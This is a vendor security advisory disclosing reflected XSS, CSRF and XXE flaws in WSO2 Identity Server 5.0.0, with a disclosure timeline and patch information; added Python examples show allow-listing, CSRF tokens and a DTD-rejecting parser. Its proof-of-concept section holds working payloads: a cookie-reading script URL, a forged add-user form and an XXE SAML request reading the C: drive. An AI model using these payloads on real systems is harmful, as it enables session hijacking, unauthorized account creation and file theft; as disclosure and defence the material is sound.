SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: WSO2 Identity Server
other WSO2 Carbon based products may be affected too
vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
fixed version: 5.0.0 with patches 1194 and 1095 applied
CVE number:
impact: critical
homepage: http://wso2.com/products/identity-server/
found: 2015-02-19
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WSO2 Identity Server provides sophisticated security and identity management
of enterprise web applications, services, and APIs, and makes life easier for
developers and architects with its hassle-free, minimal monitoring and
maintenance requirements. In its latest version, Identity Server acts as an
Enterprise Identity Bus (EIB) — a central backbone to connect and manage
multiple identities regardless of the standards on which they are based."
URL: http://wso2.com/products/identity-server/
Business recommendation:
------------------------
The WSO2 Identity Server has three security vulnerabilities that allow an
attacker to take over administrative user sessions and read arbitrary
local files. Moreover, the XXE vulnerability potentially allows an
attacker to conduct further attacks on internal servers since the
vulnerability may allow an attacker to bypass firewall rules.
SEC Consult only conducted a very quick and narrow check on the
WSO2 Identity Server. Since in this check a critical vulnerability was
found, SEC Consult suspects that the Identity Server contains even
more critical vulnerabilities.
Since other WSO2 products are based on the same framework (WSO2 Carbon
Framework), it is possible that these or similar vulnerabilities affect
other products too.
SEC Consult recommends not using any products based on the WSO2 Carbon
Framework until a thorough security review has been conducted.
Vulnerability overview/description:
-----------------------------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected cross-site scripting.
An attacker can lure a victim who is logged in to the Identity Server
administration web interface into, for example, clicking on a link, and
thereby take over the victim's session.
2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least one web page, CSRF protection has not been implemented. An
attacker on the internet could lure a victim who is logged in to the
Identity Server administration web interface onto a web page containing,
for example, a manipulated <img> tag. The attacker is then able to add
arbitrary users to the Identity Server.
3) XML external entity injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to
inject arbitrary external XML entities. This allows an attacker to read
arbitrary local files. Moreover, since the XML entity resolver allows
remote URLs, this vulnerability may allow an attacker to bypass firewall
rules and conduct further attacks on internal hosts.
Proof of concept:
-----------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When the following URL is opened, an alert box is shown as a demonstration:
http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
When a user without permission to create other users issues the following
request, an alert-box is shown:
---- snip ----
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: <host>:9443
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 261
pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
---- snip ----
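The first payload above works because the returnPath parameter is written back into an HTML attribute unchanged. The following Python snippet is an added, defender-side example (it is not WSO2 code and does not reproduce the patched server logic); it shows the two controls that close this class of bug: validate the parameter against an allow-list of known return pages, and attribute-encode whatever is finally emitted. The parameter name and the value ../userstore/index.jsp are taken from the advisory; the second allow-list entry and the hidden-field markup are constructed for the example.

```python
import html
from urllib.parse import unquote

# Allow-list of return pages the change-password page may send the user back to.
# "../userstore/index.jsp" appears in the advisory's URL; the second entry is a
# constructed placeholder standing in for other legitimate pages.
ALLOWED_RETURN_PATHS = {
    "../userstore/index.jsp",
    "../user/user-mgt.jsp",  # hypothetical, for illustration only
}
DEFAULT_RETURN_PATH = "../userstore/index.jsp"


def safe_return_path(raw: str) -> str:
    """Accept a returnPath only if it is exactly one of the known pages.

    Anything else (traversal, injected quotes, markup, absolute URLs) falls
    back to the default instead of being reflected.
    """
    value = unquote(raw or "")
    return value if value in ALLOWED_RETURN_PATHS else DEFAULT_RETURN_PATH


def attr_encode(value: str) -> str:
    """Encode a string for use inside a double-quoted HTML attribute.

    html.escape with quote=True turns <, >, &, " and ' into entities, so a
    value cannot close the attribute or open a tag even if validation is
    bypassed somewhere else.
    """
    return html.escape(value, quote=True)


def render_return_path_field(raw: str) -> str:
    """Emit the hidden field a form would carry, validated and then encoded."""
    return '<input type="hidden" name="returnPath" value="%s"/>' % attr_encode(
        safe_return_path(raw)
    )


# Constructed input modelled on the advisory's proof-of-concept (URL-decoded).
POC_RETURN_PATH = '../userstore/index.jsp"><script>alert(document.cookie)</script>'

if __name__ == "__main__":
    print(render_return_path_field(POC_RETURN_PATH))
    print(render_return_path_field("../userstore/index.jsp"))
    print(attr_encode(POC_RETURN_PATH))
```

Validation alone would already neutralise the proof of concept; the encoding step matters for every other place the value is echoed, which is why both are shown.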
2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:
---- snip ----
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">
<input type="text" name="domain" value="PRIMARY"/>
<input type="text" name="username" value="secconsult"/>
<input type="text" name="password" value="test123"/>
<input type="submit"/>
</form>
---- snip ----
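The form above succeeds because add-finish.jsp accepts any POST that carries the victim's session cookie, with nothing that ties the request to a page the server itself rendered. The following Python example is added here to illustrate the synchronizer-token pattern that addresses this; it is not WSO2 code, and the handler, the user store and the field names other than domain, username and password are constructed for the example.

```python
import hmac
import secrets

CSRF_FIELD = "csrf_token"  # constructed field name for this example


def issue_csrf_token(session: dict) -> str:
    """Bind a random token to the server-side session and return it.

    The page that renders the add-user form embeds this token as a hidden
    field; a cross-site form cannot read the victim's session and so cannot
    know the value.
    """
    token = session.get(CSRF_FIELD)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[CSRF_FIELD] = token
    return token


def csrf_token_valid(session: dict, form: dict) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    expected = session.get(CSRF_FIELD)
    supplied = form.get(CSRF_FIELD)
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def handle_add_user(session: dict, form: dict, user_store: dict) -> str:
    """Hypothetical add-finish handler: the token check runs before any
    state change, so a forged request is rejected without side effects."""
    if not csrf_token_valid(session, form):
        return "rejected: missing or invalid CSRF token"
    username = form.get("username", "")
    domain = form.get("domain", "PRIMARY")
    if not username:
        return "rejected: username required"
    user_store[f"{domain}/{username}"] = form.get("password", "")
    return f"created {domain}/{username}"


def demo() -> tuple:
    """Replay the advisory's form without a token, then a same-origin form
    that carries the session-bound token. Returns both outcomes and the
    resulting user store contents."""
    session, store = {}, {}
    token = issue_csrf_token(session)
    # Constructed copy of the fields in the advisory's cross-site form.
    forged = {"domain": "PRIMARY", "username": "secconsult", "password": "test123"}
    legit = dict(forged, **{CSRF_FIELD: token})
    forged_result = handle_add_user(session, forged, store)
    legit_result = handle_add_user(session, legit, store)
    return forged_result, legit_result, sorted(store)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The token is bound to the session rather than to the user name, so it survives across pages but is useless to anyone who does not hold that session; the comparison uses hmac.compare_digest to avoid leaking the token through timing.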
3) XML external entity injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server,
the contents of the C: drive are returned:
---- snip ----
<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [
<!ELEMENT AuthnRequest ANY >
<!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
Destination="https://<host>/samlsso"
ID="_ffffffff-0000-0000-0000-ffffffffffff"
IssueInstant="2015-01-01T01:01:01Z"
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
XXXX&xxe;YYYY
</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true"
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
---- snip ----
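The request above is only dangerous because the SAML endpoint's XML parser honours the DOCTYPE and resolves the SYSTEM entity. A SAML AuthnRequest has no legitimate use for a DTD, so the robust fix is to reject any DOCTYPE before entity resolution can start. The following Python example, added here and not part of the advisory or of WSO2's code, builds such a parser on the standard library's expat bindings and runs it against a benign request and a request shaped like the proof of concept; both inputs are constructed, with placeholder IDs and issuer values.

```python
import xml.parsers.expat as expat

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"


class DtdNotAllowed(ValueError):
    """Raised when a request carries a DOCTYPE or an external entity reference."""


def parse_authn_request(data: bytes) -> dict:
    """Extract ID and Issuer from an AuthnRequest with a DTD-free parser.

    The parser refuses any DOCTYPE, never expands parameter entities and,
    as defence in depth, refuses to fetch external entity bodies.
    """
    parser = expat.ParserCreate(namespace_separator=" ")
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    result = {"id": None, "issuer": None}
    text, in_issuer = [], [False]

    def start_doctype(name, system_id, public_id, has_internal_subset):
        # Exceptions raised in a handler propagate out of Parse().
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

    def external_entity(context, base, system_id, public_id):
        raise DtdNotAllowed(f"external entity {system_id!r} rejected")

    def start_element(name, attrs):
        if name == f"{SAMLP} AuthnRequest":
            result["id"] = attrs.get("ID")
        elif name == f"{SAML} Issuer":
            in_issuer[0] = True
            text.clear()

    def end_element(name):
        if name == f"{SAML} Issuer":
            result["issuer"] = "".join(text).strip()
            in_issuer[0] = False

    def char_data(chunk):
        if in_issuer[0]:
            text.append(chunk)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(data, True)
    return result


def rejects_dtd(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_authn_request(data)
    except DtdNotAllowed:
        return True
    return False


# Constructed sample requests (placeholder IDs and issuer).
BENIGN_REQUEST = b"""<?xml version="1.0"?>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    ID="_constructed-id-1" Version="2.0" IssueInstant="2015-01-01T01:01:01Z">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://sp.example.test/saml</saml:Issuer>
</samlp:AuthnRequest>
"""

XXE_SHAPED_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [
<!ELEMENT AuthnRequest ANY >
<!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    ID="_constructed-id-2" Version="2.0" IssueInstant="2015-01-01T01:01:01Z">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">XXXX&xxe;YYYY</saml:Issuer>
</samlp:AuthnRequest>
"""

if __name__ == "__main__":
    print(parse_authn_request(BENIGN_REQUEST))
    print("DTD-bearing request rejected:", rejects_dtd(XXE_SHAPED_REQUEST))
```

The same rule applies to the Java XML stack the product is built on: Xerces-based parsers expose the feature http://apache.org/xml/features/disallow-doctype-decl for exactly this purpose, and disabling it on every parser that handles untrusted SAML input is the check to make when reviewing a Carbon-based deployment.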
Vulnerable / tested versions:
-----------------------------
The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)
was found to be vulnerable. This was the latest version at the time
of discovery.
Vendor contact timeline:
------------------------
2015-03-19: Contacting vendor through security () wso2 com
2015-03-19: Security contact confirms retrieval of the E-Mail
2015-03-19: Security contact says that he has trouble opening the attached PDF
document
2015-03-19: Sending Responsible Disclosure Policy in plain text
2015-03-20: Security contact states he actually was unable to decrypt the
advisory
2015-03-22: Sending security advisory again
2015-03-22: Security contact confirms retrieval of the advisory
2015-03-26: Security contact acknowledges existence of the vulnerabilities
2015-04-10: Asking for an update on the current status and which products and
versions are affected
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,
fixing CSRF is in progress,
Identity Server 5.0.0 is vulnerable
2015-04-13: Asking whether the patches will be released before the latest
possible release date; asking for the status of the XXE
vulnerability and whether other products based on Carbon are
affected
2015-04-13: Advisory can be released on 2013-05-07; release notes will mention
the affected products
2015-05-04: Asking for current status
2015-05-04: Security contact: patches will be released in the next couple of
days
2015-05-05: Security contact asks to delay the release of the advisory to
2013-05-13
2015-05-05: Confirming the new release date
2015-05-05: Asking to give credit in the release notes to the patch
2015-05-13: Public release of the advisory
Solution:
---------
Apply the following patches to mitigate these issues:
* WSO2-CARBON-PATCH-4.2.0-1194
* WSO2-CARBON-PATCH-4.2.0-1095
See the following pages for more information:
https://wso2.org/jira/browse/IDENTITY-3280
https://wso2.org/jira/browse/IDENTITY-3192
The patches can be downloaded at
http://wso2.com/products/identity-server/
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult